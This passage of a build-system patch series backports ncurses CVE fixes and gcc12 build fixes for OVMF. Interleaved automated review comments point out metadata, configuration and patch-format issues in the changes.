+-#define MAX_STRTAB 4096 /* documented maximum entry size */
+-
+ static char *stringbuf; /* buffer for string capabilities */
+ static size_t next_free; /* next free character in stringbuf */
+
+@@ -71,8 +69,8 @@ _nc_init_entry(ENTRY * const tp)
+ }
+ #endif
+
+- if (stringbuf == 0)
+- TYPE_MALLOC(char, (size_t) MAX_STRTAB, stringbuf);
++ if (stringbuf == NULL)
++ TYPE_MALLOC(char, (size_t) MAX_ENTRY_SIZE, stringbuf);
+
+ next_free = 0;
+
+@@ -108,11 +106,11 @@ _nc_save_str(const char *const string)
+ * Cheat a little by making an empty string point to the end of the
+ * previous string.
+ */
+- if (next_free < MAX_STRTAB) {
++ if (next_free < MAX_ENTRY_SIZE) {
+ result = (stringbuf + next_free - 1);
+ }
+- } else if (next_free + len < MAX_STRTAB) {
+- _nc_STRCPY(&stringbuf[next_free], string, MAX_STRTAB);
++ } else if (next_free + len < MAX_ENTRY_SIZE) {
++ _nc_STRCPY(&stringbuf[next_free], string, MAX_ENTRY_SIZE);
+ DEBUG(7, ("Saved string %s", _nc_visbuf(string)));
+ DEBUG(7, ("at location %d", (int) next_free));
+ next_free += len;
+diff --git a/ncurses/tinfo/read_entry.c b/ncurses/tinfo/read_entry.c
+index 5b570b0f..23c2cebc 100644
+--- a/ncurses/tinfo/read_entry.c
++++ b/ncurses/tinfo/read_entry.c
+@@ -1,5 +1,5 @@
+ /****************************************************************************
+- * Copyright 2018-2019,2020 Thomas E. Dickey *
++ * Copyright 2018-2021,2022 Thomas E. Dickey *
+ * Copyright 1998-2016,2017 Free Software Foundation, Inc. *
+ * *
+ * Permission is hereby granted, free of charge, to any person obtaining a *
+@@ -42,7 +42,7 @@
+
+ #include <tic.h>
+
+-MODULE_ID("$Id: read_entry.c,v 1.157 2020/02/02 23:34:34 tom Exp $")
++MODULE_ID("$Id: read_entry.c,v 1.162 2022/04/16 21:00:00 tom Exp $")
+
+ #define TYPE_CALLOC(type,elts) typeCalloc(type, (unsigned)(elts))
+
+@@ -145,6 +145,7 @@ convert_strings(char *buf, char **Strings, int count, int size, char *table)
+ {
+ int i;
+ char *p;
++ bool corrupt = FALSE;
+
+ for (i = 0; i < count; i++) {
+ if (IS_NEG1(buf + 2 * i)) {
+@@ -154,8 +155,20 @@ convert_strings(char *buf, char **Strings, int count, int size, char *table)
+ } else if (MyNumber(buf + 2 * i) > size) {
+ Strings[i] = ABSENT_STRING;
+ } else {
+- Strings[i] = (MyNumber(buf + 2 * i) + table);
+- TR(TRACE_DATABASE, ("Strings[%d] = %s", i, _nc_visbuf(Strings[i])));
++ int nn = MyNumber(buf + 2 * i);
++ if (nn >= 0 && nn < size) {
++ Strings[i] = (nn + table);
++ TR(TRACE_DATABASE, ("Strings[%d] = %s", i,
++ _nc_visbuf(Strings[i])));
++ } else {
++ if (!corrupt) {
++ corrupt = TRUE;
++ TR(TRACE_DATABASE,
++ ("ignore out-of-range index %d to Strings[]", nn));
++ _nc_warning("corrupt data found in convert_strings");
++ }
++ Strings[i] = ABSENT_STRING;
++ }
+ }
+
+ /* make sure all strings are NUL terminated */
+@@ -776,7 +789,7 @@ _nc_read_tic_entry(char *filename,
+ * looking for compiled (binary) terminfo data.
+ *
+ * cgetent uses a two-level lookup. On the first it uses the given
+- * name to return a record containing only the aliases for an entry.
++ * name to return a record containing only the aliases for an entry.
+ * On the second (using that list of aliases as a key), it returns the
+ * content of the terminal description. We expect second lookup to
+ * return data beginning with the same set of aliases.
+@@ -833,7 +846,7 @@ _nc_read_tic_entry(char *filename,
+ #endif /* NCURSES_USE_DATABASE */
+
+ /*
+- * Find and read the compiled entry for a given terminal type, if it exists.
++ * Find and read the compiled entry for a given terminal type, if it exists.
+ * We take pains here to make sure no combination of environment variables and
+ * terminal type name can be used to overrun the file buffer.
+ */
+--
+2.36.1
+
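Review bot: This backport carries more than the bounds check in `convert_strings`: it bumps both `MODULE_ID` strings to the 2022/04/16 upstream revisions, edits the copyright year, and includes two whitespace-only comment hunks in `read_entry.c`. The `MODULE_ID` strings then claim file revisions that this 6.2 tree does not actually contain, which can mislead anyone who infers patch level from them, and the cosmetic hunks only add ways for the patch to stop applying; I would drop them and keep the `convert_strings` and `alloc_entry.c` changes. Separately, replacing the local `MAX_STRTAB` (4096) with `MAX_ENTRY_SIZE` changes the size of `stringbuf` to whatever that macro expands to in this tree's headers, which the hunk does not show. That value should be confirmed against 6.2 and recorded in the patch header, since it is a behaviour change beyond the out-of-bounds read fix.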
diff --git a/meta/recipes-core/ncurses/files/CVE-2023-29491.patch b/meta/recipes-core/ncurses/files/CVE-2023-29491.patch
new file mode 100644
index 0000000000..0a0497723f
--- /dev/null
+++ b/meta/recipes-core/ncurses/files/CVE-2023-29491.patch
@@ -0,0 +1,45 @@
+Backport of:
+
+Author: Sven Joachim <svenjoac@gmx.de>
+Description: Change the --disable-root-environ configure option behavior
+ By default, the --disable-root-environ option forbids program run by
+ the superuser to load custom terminfo entries. This patch changes
+ that to only restrict programs running with elevated privileges,
+ matching the behavior of the --disable-setuid-environ option
+ introduced in the 20230423 upstream patchlevel.
+Bug-Debian: https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1034372#29
+Bug: https://lists.gnu.org/archive/html/bug-ncurses/2023-04/msg00018.html
+Forwarded: not-needed
+Last-Update: 2023-05-01
+
+Upstream-Status: Backport [https://launchpad.net/ubuntu/+archive/primary/+sourcefiles/ncurses/6.2-0ubuntu2.1/ncurses_6.2-0ubuntu2.1.debian.tar.xz]
+CVE: CVE-2023-29491
+Signed-off-by: Virendra Thakur <virendrak@kpit.com>
+
+---
+ ncurses/tinfo/access.c | 2 --
+ 1 file changed, 2 deletions(-)
+
+--- a/ncurses/tinfo/access.c
++++ b/ncurses/tinfo/access.c
+@@ -178,15 +178,16 @@ _nc_is_file_path(const char *path)
+ NCURSES_EXPORT(int)
+ _nc_env_access(void)
+ {
++ int result = TRUE;
++
+ #if HAVE_ISSETUGID
+ if (issetugid())
+- return FALSE;
++ result = FALSE;
+ #elif HAVE_GETEUID && HAVE_GETEGID
+ if (getuid() != geteuid()
+ || getgid() != getegid())
+- return FALSE;
++ result = FALSE;
+ #endif
+- /* ...finally, disallow root */
+- return (getuid() != ROOT_UID) && (geteuid() != ROOT_UID);
++ return result;
+ }
+ #endif
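Review bot: `_nc_env_access` now starts from `result = TRUE` and clears it only inside the `#if HAVE_ISSETUGID` / `#elif HAVE_GETEUID && HAVE_GETEGID` branches, so with the final root test removed a build where neither macro is defined returns TRUE unconditionally. That fail-open default deserves a comment on the initialiser, e.g. `/* default: allow; only the setuid/setgid checks below can deny */`, and ideally a build-time check that one of the two branches is compiled in for the target. The diffstat in the patch header (`2 --`, 2 deletions) also no longer matches the hunk, which both adds and removes lines, so it should be regenerated.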
diff --git a/meta/recipes-core/ncurses/files/CVE-2023-50495.patch b/meta/recipes-core/ncurses/files/CVE-2023-50495.patch
new file mode 100644
index 0000000000..58c23866d1
--- /dev/null
+++ b/meta/recipes-core/ncurses/files/CVE-2023-50495.patch
@@ -0,0 +1,79 @@
+Fix for CVE-2023-50495 from upstream:
+https://github.com/ThomasDickey/ncurses-snapshots/commit/efe9674ee14b14b788f9618941f97d31742f0adc
+
+Reference:
+https://invisible-island.net/archives/ncurses/6.4/ncurses-6.4-20230424.patch.gz
+
+Upstream-Status: Backport [import from suse ftp.pbone.net/mirror/ftp.opensuse.org/update/leap-micro/5.3/sle/src/ncurses-6.1-150000.5.20.1.src.rpm
+Upstream commit https://github.com/ThomasDickey/ncurses-snapshots/commit/efe9674ee14b14b788f9618941f97d31742f0adc]
+CVE: CVE-2023-50495
+Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
+---
+ ncurses/tinfo/parse_entry.c | 23 ++++++++++++++++-------
+ 1 file changed, 16 insertions(+), 7 deletions(-)
+
+diff --git a/ncurses/tinfo/parse_entry.c b/ncurses/tinfo/parse_entry.c
+index 23574b66..56ba9ae6 100644
+--- a/ncurses/tinfo/parse_entry.c
++++ b/ncurses/tinfo/parse_entry.c
+@@ -110,7 +110,7 @@ _nc_extend_names(ENTRY * entryp, const char *name, int token_type)
+ /* Well, we are given a cancel for a name that we don't recognize */
+ return _nc_extend_names(entryp, name, STRING);
+ default:
+- return 0;
++ return NULL;
+ }
+
+ /* Adjust the 'offset' (insertion-point) to keep the lists of extended
+@@ -142,6 +142,11 @@ _nc_extend_names(ENTRY * entryp, const char *name, int token_type)
+ for (last = (unsigned) (max - 1); last > tindex; last--)
+
+ if (!found) {
++ char *saved;
++
++ if ((saved = _nc_save_str(name)) == NULL)
++ return NULL;
++
+ switch (token_type) {
+ case BOOLEAN:
+ tp->ext_Booleans++;
+@@ -169,7 +174,7 @@ _nc_extend_names(ENTRY * entryp, const char *name, int token_type)
+ TYPE_REALLOC(char *, actual, tp->ext_Names);
+ while (--actual > offset)
+ tp->ext_Names[actual] = tp->ext_Names[actual - 1];
+- tp->ext_Names[offset] = _nc_save_str(name);
++ tp->ext_Names[offset] = saved;
+ }
+
+ temp.nte_name = tp->ext_Names[offset];
+@@ -337,6 +342,8 @@ _nc_parse_entry(ENTRY * entryp, int literal, bool silent)
+ bool is_use = (strcmp(_nc_curr_token.tk_name, "use") == 0);
+ bool is_tc = !is_use && (strcmp(_nc_curr_token.tk_name, "tc") == 0);
+ if (is_use || is_tc) {
++ char *saved;
++
+ if (!VALID_STRING(_nc_curr_token.tk_valstring)
+ || _nc_curr_token.tk_valstring[0] == '\0') {
+ _nc_warning("missing name for use-clause");
+@@ -350,11 +357,13 @@ _nc_parse_entry(ENTRY * entryp, int literal, bool silent)
+ _nc_curr_token.tk_valstring);
+ continue;
+ }
+- entryp->uses[entryp->nuses].name = _nc_save_str(_nc_curr_token.tk_valstring);
+- entryp->uses[entryp->nuses].line = _nc_curr_line;
+- entryp->nuses++;
+- if (entryp->nuses > 1 && is_tc) {
+- BAD_TC_USAGE
++ if ((saved = _nc_save_str(_nc_curr_token.tk_valstring)) != NULL) {
++ entryp->uses[entryp->nuses].name = saved;
++ entryp->uses[entryp->nuses].line = _nc_curr_line;
++ entryp->nuses++;
++ if (entryp->nuses > 1 && is_tc) {
++ BAD_TC_USAGE
++ }
+ }
+ } else {
+ /* normal token lookup */
+--
+2.25.1
+
diff --git a/meta/recipes-core/ncurses/files/config.cache b/meta/recipes-core/ncurses/files/config.cache
deleted file mode 100644
index 6a9217d5bb..0000000000
--- a/meta/recipes-core/ncurses/files/config.cache
+++ /dev/null
@@ -1,4 +0,0 @@
-#! /bin/sh
-
-cf_cv_func_nanosleep=yes
-cf_cv_func_mkstemp=yes
diff --git a/meta/recipes-core/ncurses/ncurses.inc b/meta/recipes-core/ncurses/ncurses.inc
index 4156bf4f7d..ee0b15ecf0 100644
--- a/meta/recipes-core/ncurses/ncurses.inc
+++ b/meta/recipes-core/ncurses/ncurses.inc
@@ -13,10 +13,11 @@ BINCONFIG = "${bindir}/ncurses5-config ${bindir}/ncursesw5-config \
inherit autotools binconfig-disabled multilib_header pkgconfig
# Upstream has useful patches at times at ftp://invisible-island.net/ncurses/
-SRC_URI = "git://salsa.debian.org/debian/ncurses.git;protocol=https"
+SRC_URI = "git://salsa.debian.org/debian/ncurses.git;protocol=https;branch=master"
EXTRA_AUTORECONF = "-I m4"
-CONFIG_SITE =+ "${WORKDIR}/config.cache"
+
+CACHED_CONFIGUREVARS = "cf_cv_func_nanosleep=yes"
EXTRASITECONFIG = "CFLAGS='${CFLAGS} -I${SYSROOT_DESTDIR}${includedir}'"
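Review bot: `CACHED_CONFIGUREVARS` carries over only `cf_cv_func_nanosleep=yes`, while the deleted `files/config.cache` also pinned `cf_cv_func_mkstemp=yes`, and nothing visible here says why that one was dropped. If configure cannot run its mkstemp test when cross-compiling, it may settle on a different temporary-file routine; that is inferred, since the configure script is not shown. Either keep it, `CACHED_CONFIGUREVARS = "cf_cv_func_nanosleep=yes cf_cv_func_mkstemp=yes"`, or add a comment stating that the cross build now detects mkstemp correctly on its own.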
@@ -306,7 +307,7 @@ FILES_${PN}-tools = "\
"
# 'reset' is a symlink to 'tset' which is in the 'ncurses' package
-RDEPENDS_${PN}-tools = "${PN}"
+RDEPENDS_${PN}-tools = "${PN} ${PN}-terminfo-base"
FILES_${PN}-terminfo = "\
${datadir}/terminfo \
@@ -318,3 +319,8 @@ FILES_${PN}-terminfo-base = "\
RSUGGESTS_${PN}-libtinfo = "${PN}-terminfo"
RRECOMMENDS_${PN}-libtinfo = "${PN}-terminfo-base"
+
+# Putting terminfo into the sysroot adds around 2800 files to
+# each recipe specific sysroot. We can live without this, particularly
+# as many recipes may have native and target copies.
+SYSROOT_DIRS_remove = "${datadir}"
diff --git a/meta/recipes-core/ncurses/ncurses_6.2.bb b/meta/recipes-core/ncurses/ncurses_6.2.bb
index 723e685a9b..dbff149f55 100644
--- a/meta/recipes-core/ncurses/ncurses_6.2.bb
+++ b/meta/recipes-core/ncurses/ncurses_6.2.bb
@@ -2,12 +2,16 @@ require ncurses.inc
SRC_URI += "file://0001-tic-hang.patch \
file://0002-configure-reproducible.patch \
- file://config.cache \
+ file://0003-gen-pkgconfig.in-Do-not-include-LDFLAGS-in-generated.patch \
+ file://CVE-2021-39537.patch \
+ file://CVE-2022-29458.patch \
+ file://CVE-2023-29491.patch \
+ file://CVE-2023-50495.patch \
"
# commit id corresponds to the revision in package version
SRCREV = "a669013cd5e9d6434e5301348ea51baf306c93c4"
S = "${WORKDIR}/git"
-EXTRA_OECONF += "--with-abi-version=5 --cache-file=${B}/config.cache"
+EXTRA_OECONF += "--with-abi-version=5 --disable-root-environ"
UPSTREAM_CHECK_GITTAGREGEX = "(?P<pver>\d+(\.\d+)+(\+\d+)*)"
# This is needed when using patchlevel versions like 6.1+20181013
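Review bot: `--disable-root-environ` in `EXTRA_OECONF` no longer means what its name says once `CVE-2023-29491.patch` from the same `SRC_URI` is applied. That patch removes the `getuid() != ROOT_UID` test, so only setuid/setgid-style processes are stopped from using environment-supplied terminfo, and a plain root process is not. Someone auditing the recipe would otherwise assume root is restricted too, so a comment above the line should record this, for example `# With CVE-2023-29491.patch this restricts setuid/setgid programs only, not plain root`.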
diff --git a/meta/recipes-core/os-release/os-release.bb b/meta/recipes-core/os-release/os-release.bb
index a29d678125..33f75e39b8 100644
--- a/meta/recipes-core/os-release/os-release.bb
+++ b/meta/recipes-core/os-release/os-release.bb
@@ -12,7 +12,9 @@ do_configure[noexec] = "1"
# Other valid fields: BUILD_ID ID_LIKE ANSI_COLOR CPE_NAME
# HOME_URL SUPPORT_URL BUG_REPORT_URL
-OS_RELEASE_FIELDS = "ID ID_LIKE NAME VERSION VERSION_ID PRETTY_NAME"
+OS_RELEASE_FIELDS = "\
+ ID ID_LIKE NAME VERSION VERSION_ID PRETTY_NAME DISTRO_CODENAME \
+"
OS_RELEASE_UNQUOTED_FIELDS = "ID VERSION_ID VARIANT_ID"
ID = "${DISTRO}"
diff --git a/meta/recipes-core/ovmf/ovmf-shell-image.bb b/meta/recipes-core/ovmf/ovmf-shell-image.bb
index 0d2b8bf52f..fd4fb5b732 100644
--- a/meta/recipes-core/ovmf/ovmf-shell-image.bb
+++ b/meta/recipes-core/ovmf/ovmf-shell-image.bb
@@ -1,4 +1,5 @@
DESCRIPTION = "boot image with UEFI shell and tools"
+COMPATIBLE_HOST_class-target='(i.86|x86_64).*'
# For this image recipe, only the wic format with a
# single vfat partition makes sense. Because we have no
diff --git a/meta/recipes-core/ovmf/ovmf/0001-Basetools-genffs-fix-gcc12-warning.patch b/meta/recipes-core/ovmf/ovmf/0001-Basetools-genffs-fix-gcc12-warning.patch
new file mode 100644
index 0000000000..4418d52898
--- /dev/null
+++ b/meta/recipes-core/ovmf/ovmf/0001-Basetools-genffs-fix-gcc12-warning.patch
@@ -0,0 +1,49 @@
+From 7b005f344e533cd913c3ca05b266f9872df886d1 Mon Sep 17 00:00:00 2001
+From: Gerd Hoffmann <kraxel@redhat.com>
+Date: Thu, 24 Mar 2022 20:04:34 +0800
+Subject: [PATCH] BaseTools: fix gcc12 warning
+
+GenFfs.c:545:5: error: pointer ?InFileHandle? used after ?fclose? [-Werror=use-after-free]
+ 545 | Error(NULL, 0, 4001, "Resource", "memory cannot be allocated of %s", InFileHandle);
+ | ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+GenFfs.c:544:5: note: call to ?fclose? here
+ 544 | fclose (InFileHandle);
+ | ^~~~~~~~~~~~~~~~~~~~~
+
+Signed-off-by: Gerd Hoffmann <kraxel@redhat.com>
+Reviewed-by: Bob Feng <bob.c.feng@intel.com>
+
+Upstream-Status: Backport [https://github.com/tianocore/edk2/commit/7b005f344e533cd913c3ca05b266f9872df886d1]
+Signed-off-by: Steve Sakoman <steve@sakoman.com>
+
+---
+ BaseTools/Source/C/GenFfs/GenFfs.c | 2 +-
+ BaseTools/Source/C/GenSec/GenSec.c | 2 +-
+ 2 files changed, 2 insertions(+), 2 deletions(-)
+
+diff --git a/BaseTools/Source/C/GenFfs/GenFfs.c b/BaseTools/Source/C/GenFfs/GenFfs.c
+index 949025c33325..d78d62ab3689 100644
+--- a/BaseTools/Source/C/GenFfs/GenFfs.c
++++ b/BaseTools/Source/C/GenFfs/GenFfs.c
+@@ -542,7 +542,7 @@ GetAlignmentFromFile(char *InFile, UINT32 *Alignment)
+ PeFileBuffer = (UINT8 *) malloc (PeFileSize);
+ if (PeFileBuffer == NULL) {
+ fclose (InFileHandle);
+- Error(NULL, 0, 4001, "Resource", "memory cannot be allocated of %s", InFileHandle);
++ Error(NULL, 0, 4001, "Resource", "memory cannot be allocated for %s", InFile);
+ return EFI_OUT_OF_RESOURCES;
+ }
+ fread (PeFileBuffer, sizeof (UINT8), PeFileSize, InFileHandle);
+diff --git a/BaseTools/Source/C/GenSec/GenSec.c b/BaseTools/Source/C/GenSec/GenSec.c
+index d54a4f9e0a7d..b1d05367ec0b 100644
+--- a/BaseTools/Source/C/GenSec/GenSec.c
++++ b/BaseTools/Source/C/GenSec/GenSec.c
+@@ -1062,7 +1062,7 @@ GetAlignmentFromFile(char *InFile, UINT32 *Alignment)
+ PeFileBuffer = (UINT8 *) malloc (PeFileSize);
+ if (PeFileBuffer == NULL) {
+ fclose (InFileHandle);
+- Error(NULL, 0, 4001, "Resource", "memory cannot be allocated of %s", InFileHandle);
++ Error(NULL, 0, 4001, "Resource", "memory cannot be allocated for %s", InFile);
+ return EFI_OUT_OF_RESOURCES;
+ }
+ fread (PeFileBuffer, sizeof (UINT8), PeFileSize, InFileHandle);
diff --git a/meta/recipes-core/ovmf/ovmf/0001-Basetools-lzmaenc-fix-gcc12-warning.patch b/meta/recipes-core/ovmf/ovmf/0001-Basetools-lzmaenc-fix-gcc12-warning.patch
new file mode 100644
index 0000000000..a6ef87aa79
--- /dev/null
+++ b/meta/recipes-core/ovmf/ovmf/0001-Basetools-lzmaenc-fix-gcc12-warning.patch
@@ -0,0 +1,53 @@
+From 24551a99d1f765c891a4dc21a36f18ccbf56e612 Mon Sep 17 00:00:00 2001
+From: Steve Sakoman <steve@sakoman.com>
+Date: Tue, 10 Jan 2023 06:15:00 -1000
+Subject: [PATCH] BaseTools: fix gcc12 warning
+
+Sdk/C/LzmaEnc.c: In function ?LzmaEnc_CodeOneMemBlock?:
+Sdk/C/LzmaEnc.c:2828:19: error: storing the address of local variable ?outStream? in ?*p.rc.outStream? [-Werror=dangling-pointer=]
+ 2828 | p->rc.outStream = &outStream.vt;
+ | ~~~~~~~~~~~~~~~~^~~~~~~~~~~~~~~
+Sdk/C/LzmaEnc.c:2811:28: note: ?outStream? declared here
+ 2811 | CLzmaEnc_SeqOutStreamBuf outStream;
+ | ^~~~~~~~~
+Sdk/C/LzmaEnc.c:2811:28: note: ?pp? declared here
+Sdk/C/LzmaEnc.c:2828:19: error: storing the address of local variable ?outStream? in ?*(CLzmaEnc *)pp.rc.outStream? [-Werror=dangling-pointer=]
+ 2828 | p->rc.outStream = &outStream.vt;
+ | ~~~~~~~~~~~~~~~~^~~~~~~~~~~~~~~
+Sdk/C/LzmaEnc.c:2811:28: note: ?outStream? declared here
+ 2811 | CLzmaEnc_SeqOutStreamBuf outStream;
+ | ^~~~~~~~~
+Sdk/C/LzmaEnc.c:2811:28: note: ?pp? declared here
+cc1: all warnings being treated as errors
+
+Signed-off-by: Gerd Hoffmann <kraxel@redhat.com>
+Reviewed-by: Bob Feng <bob.c.feng@intel.com>
+
+Upstream-Status: Backport [https://github.com/tianocore/edk2/commit/85021f8cf22d1bd4114803c6c610dea5ef0059f1]
+Signed-off-by: Steve Sakoman <steve@sakoman.com>
+---
+ BaseTools/Source/C/LzmaCompress/Sdk/C/LzmaEnc.c | 3 ++-
+ 1 file changed, 2 insertions(+), 1 deletion(-)
+
+diff --git a/BaseTools/Source/C/LzmaCompress/Sdk/C/LzmaEnc.c b/BaseTools/Source/C/LzmaCompress/Sdk/C/LzmaEnc.c
+index e281716fee..b575c4f888 100644
+--- a/BaseTools/Source/C/LzmaCompress/Sdk/C/LzmaEnc.c
++++ b/BaseTools/Source/C/LzmaCompress/Sdk/C/LzmaEnc.c
+@@ -2638,12 +2638,13 @@ SRes LzmaEnc_CodeOneMemBlock(CLzmaEncHandle pp, Bool reInit,
+
+ nowPos64 = p->nowPos64;
+ RangeEnc_Init(&p->rc);
+- p->rc.outStream = &outStream.vt;
+
+ if (desiredPackSize == 0)
+ return SZ_ERROR_OUTPUT_EOF;
+
++ p->rc.outStream = &outStream.vt;
+ res = LzmaEnc_CodeOneBlock(p, desiredPackSize, *unpackSize);
++ p->rc.outStream = NULL;
+
+ *unpackSize = (UInt32)(p->nowPos64 - nowPos64);
+ *destLen -= outStream.rem;
+--
+2.25.1
+
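Review bot: The reason for the added `p->rc.outStream = NULL;` is not recorded in the code: per the quoted compiler output `outStream` is a local of `LzmaEnc_CodeOneMemBlock`, so the encoder state must not keep its address once the function returns. A comment on that line, e.g. `/* outStream lives on this stack frame; do not leave a pointer to it in p */`, would stop a later cleanup from removing it. The mail header also names a different author and date (Steve Sakoman, 2023) than the `Signed-off-by` chain of the upstream change cited in `Upstream-Status`; keeping the original `From:`/`Date:` makes the backport easier to trace. The function body starts and ends outside the hunk.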
diff --git a/meta/recipes-core/ovmf/ovmf/0001-Basetools-turn-off-gcc12-warning.patch b/meta/recipes-core/ovmf/ovmf/0001-Basetools-turn-off-gcc12-warning.patch
new file mode 100644
index 0000000000..73a432684c
--- /dev/null
+++ b/meta/recipes-core/ovmf/ovmf/0001-Basetools-turn-off-gcc12-warning.patch
@@ -0,0 +1,41 @@
+From 22130dcd98b4d4b76ac8d922adb4a2dbc86fa52c Mon Sep 17 00:00:00 2001
+From: Gerd Hoffmann <kraxel@redhat.com>
+Date: Thu, 24 Mar 2022 20:04:36 +0800
+Subject: [PATCH] Basetools: turn off gcc12 warning
+
+In function ?SetDevicePathEndNode?,
+ inlined from ?FileDevicePath? at DevicePathUtilities.c:857:5:
+DevicePathUtilities.c:321:3: error: writing 4 bytes into a region of size 1 [-Werror=stringop-overflow=]
+ 321 | memcpy (Node, &mUefiDevicePathLibEndDevicePath, sizeof (mUefiDevicePathLibEndDevicePath));
+ | ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+In file included from UefiDevicePathLib.h:22,
+ from DevicePathUtilities.c:16:
+../Include/Protocol/DevicePath.h: In function ?FileDevicePath?:
+../Include/Protocol/DevicePath.h:51:9: note: destination object ?Type? of size 1
+ 51 | UINT8 Type; ///< 0x01 Hardware Device Path.
+ | ^~~~
+
+Signed-off-by: Gerd Hoffmann <kraxel@redhat.com>
+Reviewed-by: Bob Feng <bob.c.feng@intel.com>
+
+Upstream-Status: Backport [https://github.com/tianocore/edk2/commit/22130dcd98b4d4b76ac8d922adb4a2dbc86fa52c]
+Signed-off-by: Steve Sakoman <steve@sakoman.com>
+
+---
+ BaseTools/Source/C/DevicePath/GNUmakefile | 3 +++
+ 1 file changed, 3 insertions(+)
+
+diff --git a/BaseTools/Source/C/DevicePath/GNUmakefile b/BaseTools/Source/C/DevicePath/GNUmakefile
+index 7ca08af9662d..b05d2bddfa68 100644
+--- a/BaseTools/Source/C/DevicePath/GNUmakefile
++++ b/BaseTools/Source/C/DevicePath/GNUmakefile
+@@ -13,6 +13,9 @@ OBJECTS = DevicePath.o UefiDevicePathLib.o DevicePathFromText.o DevicePathUtili
+
+ include $(MAKEROOT)/Makefiles/app.makefile
+
++# gcc 12 trips over device path handling
++BUILD_CFLAGS += -Wno-error=stringop-overflow
++
+ LIBS = -lCommon
+ ifeq ($(CYGWIN), CYGWIN)
+ LIBS += -L/lib/e2fsprogs -luuid
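Review bot: The added comment `# gcc 12 trips over device path handling` does not say whether the `stringop-overflow` diagnostic on the `memcpy` in `SetDevicePathEndNode` is a false positive or a real overflow being tolerated, and `-Wno-error=stringop-overflow` then covers every object built by this GNUmakefile. If it is a false positive, the comment should say so and why, e.g. `# gcc 12 false positive: memcpy in SetDevicePathEndNode targets the whole end node, not the 1-byte Type field`; that reading is inferred from the quoted compiler output and needs confirming against the source. Since only `-Werror` is relaxed the warning still prints, so a genuine overflow added later in this directory would no longer fail the build, and the header should record a plan to drop the flag once the code is fixed upstream.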
diff --git a/meta/recipes-core/ovmf/ovmf/0001-Fix-VLA-parameter-warning.patch b/meta/recipes-core/ovmf/ovmf/0001-Fix-VLA-parameter-warning.patch
new file mode 100644
index 0000000000..d658123b81
--- /dev/null
+++ b/meta/recipes-core/ovmf/ovmf/0001-Fix-VLA-parameter-warning.patch
@@ -0,0 +1,51 @@
+From 498627ebda6271b59920f43a0b9b6187edeb7b09 Mon Sep 17 00:00:00 2001
+From: Adrian Herrera <adr.her.arc.95@gmail.com>
+Date: Mon, 22 Mar 2021 21:06:47 +0000
+Subject: [PATCH] Fix VLA parameter warning
+
+Make VLA buffer types consistent in declarations and definitions.
+Resolves build crash when using -Werror due to "vla-parameter" warning.
+
+Upstream-Status: Submitted [https://github.com/google/brotli/pull/893]
+Signed-off-by: Adrian Herrera <adr.her.arc.95@gmail.com>
+---
+ c/dec/decode.c | 6 ++++--
+ c/enc/encode.c | 5 +++--
+ 2 files changed, 7 insertions(+), 4 deletions(-)
+
+diff --git a/BaseTools/Source/C/BrotliCompress/brotli/c/dec/decode.c b/BaseTools/Source/C/BrotliCompress/brotli/c/dec/decode.c
+index 114c505..bb6f1ab 100644
+--- a/BaseTools/Source/C/BrotliCompress/brotli/c/dec/decode.c
++++ b/BaseTools/Source/C/BrotliCompress/brotli/c/dec/decode.c
+@@ -2030,8 +2030,10 @@ static BROTLI_NOINLINE BrotliDecoderErrorCode SafeProcessCommands(
+ }
+
+ BrotliDecoderResult BrotliDecoderDecompress(
+- size_t encoded_size, const uint8_t* encoded_buffer, size_t* decoded_size,
+- uint8_t* decoded_buffer) {
++ size_t encoded_size,
++ const uint8_t encoded_buffer[BROTLI_ARRAY_PARAM(encoded_size)],
++ size_t* decoded_size,
++ uint8_t decoded_buffer[BROTLI_ARRAY_PARAM(*decoded_size)]) {
+ BrotliDecoderState s;
+ BrotliDecoderResult result;
+ size_t total_out = 0;
+diff --git a/c/enc/encode.c b/c/enc/encode.c
+index 68548ef..ab0a490 100644
+--- a/BaseTools/Source/C/BrotliCompress/brotli/c/enc/encode.c
++++ c/BaseTools/Source/C/BrotliCompress/brotli/c/enc/encode.c
+@@ -1470,8 +1470,9 @@ static size_t MakeUncompressedStream(
+
+ BROTLI_BOOL BrotliEncoderCompress(
+ int quality, int lgwin, BrotliEncoderMode mode, size_t input_size,
+- const uint8_t* input_buffer, size_t* encoded_size,
+- uint8_t* encoded_buffer) {
++ const uint8_t input_buffer[BROTLI_ARRAY_PARAM(input_size)],
++ size_t* encoded_size,
++ uint8_t encoded_buffer[BROTLI_ARRAY_PARAM(*encoded_size)]) {
+ BrotliEncoderState* s;
+ size_t out_size = *encoded_size;
+ const uint8_t* input_start = input_buffer;
+--
+2.31.1
+
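Review bot: The headers of the second file section are inconsistent: `diff --git a/c/enc/encode.c b/c/enc/encode.c` uses the brotli-relative path, `---` uses `a/BaseTools/...`, and `+++` uses the prefix `c/` instead of `b/`; the diffstat likewise lists `c/dec/decode.c` and `c/enc/encode.c`. A tool that simply strips one path component will probably still apply it, but an applier that cross-checks the `diff --git` line against `---`/`+++` may reject it (not verified here). Regenerating the patch against the edk2 tree, so all three lines name `BaseTools/Source/C/BrotliCompress/brotli/c/enc/encode.c` with the usual `a/` and `b/` prefixes, removes the doubt. The `Upstream-Status: Submitted` link is to google/brotli while the patch is applied to the copy under edk2's BaseTools, which is worth stating in the header.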
diff --git a/meta/recipes-core/ovmf/ovmf/0001-ovmf-update-path-to-native-BaseTools.patch b/meta/recipes-core/ovmf/ovmf/0001-ovmf-update-path-to-native-BaseTools.patch
index 6ecb23b29f..c32963a807 100644
--- a/meta/recipes-core/ovmf/ovmf/0001-ovmf-update-path-to-native-BaseTools.patch
+++ b/meta/recipes-core/ovmf/ovmf/0001-ovmf-update-path-to-native-BaseTools.patch
@@ -1,7 +1,7 @@
-From 0a8362cfb9f00870d70687475665b131dd82c947 Mon Sep 17 00:00:00 2001
+From 200ff35c6545b4ab85f5ea7a6096fbaec3d82f6d Mon Sep 17 00:00:00 2001
From: Ricardo Neri <ricardo.neri-calderon@linux.intel.com>
Date: Thu, 9 Jun 2016 02:23:01 -0700
-Subject: [PATCH 1/5] ovmf: update path to native BaseTools
+Subject: [PATCH 1/4] ovmf: update path to native BaseTools
BaseTools is a set of utilities to build EDK-based firmware. These utilities
